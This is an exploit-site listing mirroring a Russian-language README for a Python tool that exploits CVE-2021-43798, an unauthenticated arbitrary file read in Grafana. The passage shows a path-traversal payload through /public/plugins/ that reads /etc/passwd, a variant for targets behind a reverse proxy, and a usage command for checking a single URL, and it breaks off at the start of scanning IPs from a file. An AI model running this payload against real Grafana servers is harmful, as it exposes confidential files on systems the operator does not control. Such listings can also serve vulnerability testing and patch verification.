Sploitus

Exploit for CVE-2021-43798-grafana_fileread

kitploit · 2026-09-03

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MOCH3N-CVE-2021-43798-GRAFANA_FILEREAD
# CVE-2021-43798-grafana_fileread

**Если объект обработан через обратный прокси, можно заменить payload на этот**

root@kitploit:~
    
    
    url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
    

Grafana — это кроссплатформенная веб-платформа с открытым исходным кодом для визуализации данных. После того как пользователь подключает источник данных, Grafana может отображать графики данных и предупреждения в веб-браузере.  
В Grafana существует уязвимость неавторизованного чтения произвольных файлов: не прошедший аутентификацию злоумышленник может использовать её для чтения произвольных файлов на хосте.

CVE: CVE-2021-43798  
Компонент: Grafana Тип уязвимости: чтение файлов  
Воздействие: получение конфиденциальной информации  
Краткое описание: неавторизованный злоумышленник может использовать эту уязвимость для получения конфиденциальных файлов с сервера

# Инструкция по использованию

  1. Проверка одного URL-адреса



root@kitploit:~
    
    
    python3 grafana_fileread.py -u http://localhost:3000
    

![image](https://assets.kitploit.com/production/public/readmes/38025/ebf816174547f258b133007e82b0e8532cebba8cfadb69864d3fdf494171a553.png) Полученные данные можно просмотреть в файле grafana 8.x_fileread_vuln.txt ![image](https://assets.kitploit.com/production/public/readmes/38025/010eeecd09332b231c314d4dbe3e7a7a73e73a0a3ac96f8a28e4d0da870a613f.png) 2\. Проверка IP-адресов из файла